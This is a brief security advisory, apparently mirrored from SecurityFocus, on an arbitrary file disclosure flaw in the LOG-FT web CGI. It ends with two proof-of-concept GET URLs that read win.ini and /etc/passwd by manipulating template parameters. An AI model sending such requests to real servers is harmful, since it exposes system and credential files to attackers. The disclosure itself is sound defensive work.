11 lines
No EOL
806 B
Text
11 lines
No EOL
806 B
Text
source: https://www.securityfocus.com/bid/12998/info
|
|
|
|
LOG-FT is reported prone to an arbitrary file disclosure vulnerability. This issue results from an access validation error and can allow a remote attacker to disclose sensitive data.
|
|
|
|
It is reported that an attacker can simply issue a specially crafted HTTP GET request to disclose sensitive files in the context of the affected Web server.
|
|
|
|
Information disclosed through this attack may expose sensitive data that may be used to carry out further attacks against a computer. It is not confirmed whether this issue may also allow an attacker to upload arbitrary files.
|
|
|
|
http://www.example.com/logwebcgi/logwebftbs2000.exe?VAR_FT_LANG=c:\&VAR_FT_TMPL=winnt/win.ini
|
|
|
|
http://www.example.com/logwebcgi/logwebftbs2000.exe?VAR_FT_LANG=/etc&VAR_FT_TMPL=passwd |